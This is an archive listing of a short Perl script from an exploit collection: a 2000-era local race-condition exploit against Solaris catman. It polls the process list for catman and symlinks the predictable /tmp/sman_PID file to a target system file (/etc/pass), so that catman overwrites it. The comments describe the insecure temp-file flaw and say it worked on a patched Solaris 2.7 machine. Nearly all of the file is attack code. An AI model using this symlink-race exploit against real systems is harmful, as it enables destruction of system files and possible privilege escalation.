home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / ctman-race2.pl < prev    next >
Encoding:
Perl Script  |  2005-02-12  |  912 b   |  31 lines
  1. #!/usr/local/bin/perl -w 
  2. # The problem is catman creates files in /tmp insecurly. They are based on the PID of the catman
  3. # process,  catman will happily clobber any files that are symlinked to that file.
  4. # The idea of this script is to watch the process list for the catman process, 
  5. # get the pid and Create a symlink in /tmp to our file to be
  6. # clobbered.  This exploit depends on system speed and process load.   
  7. # This worked on a patched Solaris 2.7 box (August 2000 patch cluster)
  8. # SunOS rootabega 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-1
  9. # lwc@vapid.betteros.org   11/21/2000   Vapid Labs.
  10. # http://vapid.betteros.org
  11.  
  12.  
  13.  
  14. $clobber = "/etc/pass";
  15. while(1) {
  16. open ps,"ps -ef | grep -v grep |grep -v PID |";
  17.  
  18. while(<ps>) {
  19. @args = split " ", $_;
  20.  
  21. if (/catman/) { 
  22.         print "Symlinking sman_$args[1] to  $clobber\n";
  23.         symlink($clobber,"/tmp/sman_$args[1]");
  24.         exit(1);
  25.    }
  26.  }
  27.  
  28. }
  29.  
  30.  
  31.